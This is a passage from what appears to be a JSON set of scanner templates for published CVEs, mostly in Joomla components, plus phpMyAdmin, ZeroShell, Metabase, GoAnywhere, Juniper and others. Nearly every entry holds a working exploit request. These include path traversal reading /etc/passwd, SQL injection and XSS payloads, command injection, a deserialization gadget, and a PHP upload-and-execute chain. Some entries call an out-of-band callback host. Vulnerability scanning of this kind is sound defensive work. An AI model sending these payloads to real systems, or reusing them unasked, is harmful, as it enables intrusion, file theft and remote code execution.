Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2050","info":{"name":"Joomla! Component MS Comment 0.8.0b - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4231","info":{"name":"Camtron CMNC-200 IP Camera - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4282","info":{"name":"phpShowtime 2.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1607","info":{"name":"Joomla! Component WMI 1.5.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1979","info":{"name":"Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2682","info":{"name":"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1956","info":{"name":"Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1312","info":{"name":"Joomla! Component News Portal 1.5.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1340","info":{"name":"Joomla! Component com_jresearch - 'Controller' Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1478","info":{"name":"Joomla! Component Jfeedback 1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0467","info":{"name":"Joomla! Component CCNewsLetter - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2918","info":{"name":"Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4769","info":{"name":"Joomla! Component Jimtawl 1.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1470","info":{"name":"Joomla! Component Web TV 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1981","info":{"name":"Joomla! Component Fabrik 2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1953","info":{"name":"Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1307","info":{"name":"Joomla! Component Magic Updater - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4617","info":{"name":"Joomla! Component JotLoader 2.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1603","info":{"name":"Joomla! Component ZiMBCore 0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1305","info":{"name":"Joomla! Component JInventory 1.23.02 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1957","info":{"name":"Joomla! Component Love Factory 1.3.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2033","info":{"name":"Joomla! Percha Categories Tree 0.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2036","info":{"name":"Joomla! Component Percha Fields Attach 1.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1491","info":{"name":"Joomla! Component MMS Blog 2.3.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1056","info":{"name":"Joomla! Component com_rokdownloads - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0943","info":{"name":"Joomla! Component com_jashowcase - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1977","info":{"name":"Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0972","info":{"name":"Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1955","info":{"name":"Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1313","info":{"name":"Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0157","info":{"name":"Joomla! Component com_biblestudy - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1353","info":{"name":"Joomla! Component LoginBox - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-3203","info":{"name":"Joomla! Component PicSell 1.0 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1217","info":{"name":"Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1534","info":{"name":"Joomla! Component Shoutbox Pro - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1723","info":{"name":"Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1314","info":{"name":"Joomla! Component Highslide 1.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2680","info":{"name":"Joomla! Component jesectionfinder - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1471","info":{"name":"Joomla! Component Address Book 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1952","info":{"name":"Joomla! Component BeeHeard 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1535","info":{"name":"Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1345","info":{"name":"Joomla! Component Cookex Agency CKForms - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1533","info":{"name":"Joomla! Component TweetLA 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0545","info":{"name":"ZeroShell <= 1.0beta11 Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2009-1151","info":{"name":"PhpMyAdmin Scripts - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /scripts/setup.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=test&configuration=O:10:\"PMA_Config\":1:{s:6:\"source\",s:11:\"/etc/passwd\";}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-2100","info":{"name":"Joomla! JoomlaPraise Projectfork  2.0.10 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4223","info":{"name":"KR-Web <=1.1b2 - Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-5114","info":{"name":"WebGlimpse 2.18.7 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1558","info":{"name":"Cisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-3318","info":{"name":"Joomla! Roland Breedveld Album 1.14 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4679","info":{"name":"Joomla! Portfolio Nexus - Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4202","info":{"name":"Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-2015","info":{"name":"Joomla! MooFAQ 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-5020","info":{"name":"AWStats < 6.95 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awstats/awredir.pl?url=interact.sh","{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2009-1496","info":{"name":"Joomla! Cmimarketplace 0.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1872","info":{"name":"Adobe Coldfusion <=8.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0932","info":{"name":"Horde/Horde Groupware - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0347","info":{"name":"Autonomy Ultraseek - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cs.html?url=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2009-3053","info":{"name":"Joomla! Agora 3.0.0b  - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27008","info":{"name":"ATutor < 2.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /atutor/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntoken=asdf\");}alert(document.domain);+function+asdf()+{//\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[");}alert(document.domain); function","ATutor","Login"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-20887","info":{"name":"VMware VRealize Network Insight - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /saas./resttosaasservlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-thrift\n\n[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"1111\"},\"2\":{\"str\":\"`{{cmd}}`\"},\"3\":{\"str\":\"value3\"},\"4\":{\"lst\":[\"str\",2,\"AAAA\",\"BBBB\"]}}]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"rec\":"]},{"type":"word","part":"header","words":["application/x-thrift"]},{"type":"word","part":"body","negative":true,"words":["Provided invalid node Id","Invalid nodeId"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-26842","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /OptionManager.php?mode=classes&ListID=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n1name=Member&2name=Regular+Attender&3name=Guest&4name=Non-Attender&5name=Non-Attender+%28staff%29&newFieldName=\" onfocus=alert(document.domain) autofocus=\"&AddField=Add+New+Person+Classification\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=alert(document.domain) autofocus=\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2023-34843","info":{"name":"Traggo Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0562","info":{"name":"Bank Locker Management System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /banker/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+AND+4719%3D4719--+GZHh&inputpwd=ABC&login=\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"admin\")","contains(body, \"BLMS | Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2023-25346","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","GET /v2/person/not-found?id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-38646","info":{"name":"Metabase < 0.46.6.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /api/session/properties HTTP/1.1\nHost: {{Hostname}}\n","POST /api/setup/validate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n   \"token\":\"{{token}}\",\n   \"details\":{\n      \"details\":{\n         \"subprotocol\":\"h2\",\n         \"classname\":\"org.h2.Driver\",\n         \"advanced-options\":true,\n         \"subname\":\"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '{{file}}'//\\\\;\"\n      },\n      \"name\":\"{{randstr}}\",\n      \"engine\":\"postgres\"\n   }\n}\n"],"extractors":[{"type":"json","part":"body_1","name":"token","json":[".[\"setup-token\"]"],"internal":true}],"matchers":[{"type":"dsl","dsl":["contains_any(body_2, \"Syntax error in SQL statement\",\"NoSuchFileException\")","status_code_2 == 400"],"condition":"and"}]}]},{"id":"CVE-2023-30212","info":{"name":"OURPHP <= 7.2.0 -  Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["location.href='../..</script><script>alert(document.domain)</script>'"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0669","info":{"name":"Fortra GoAnywhere MFT - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /goanywhere/lic/accept HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\n\nbundle={{concat(url_encode(base64(aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"Dmmjg5tuz0Vkm4YfSicXG2aHDJVnpBROuvPVL9xAZMo=\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\")))), '$2')}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["GoAnywhere"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-36844","info":{"name":"Juniper Devices - Remote Code Execution","severity":"medium"},"requests":[{"raw":["POST /webauth_operation.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrs=do_upload&rsargs[]=[{\"fileData\": \"data:text/html;base64,{{base64(payload)}}\", \"fileName\": \"{{rand_base(5, \"abc\")}}.php\", \"csize\": {{len(payload)}}}]\n","POST /webauth_operation.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrs=do_upload&rsargs[]=[{\"fileName\": \"{{rand_base(5, \"abc\")}}.ini\", \"fileData\": \"data:text/html;base64,{{base64(concat('auto_prepend_file=',hex_decode('22'),'/var/tmp/',phpfile,hex_decode('22')))}}\", \"csize\": \"97\" }]\n","GET /webauth_operation.php?PHPRC=/var/tmp/{{inifile}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"original_fileName\":","\"converted_fileName\":"],"condition":"and"},{"type":"word","part":"body_3","words":["{{md5(value)}}"]}],"extractors":[{"type":"regex","part":"body_1","name":"phpfile","regex":["([a-f0-9]{64}\\.php)"],"internal":true},{"type":"regex","part":"body_2","name":"inifile","regex":["([a-f0-9]{64}\\.ini)"],"internal":true}]}]},{"id":"CVE-2023-0126","info":{"name":"SonicWall SMA1000 LFI","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/images//////////////////../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["content/unknown"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22478","info":{"name":"KubePi <= v1.6.4 LoginLogsSearch - Unauthorized Access","severity":"high"},"requests":[{"raw":["@timeout 10\nPOST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 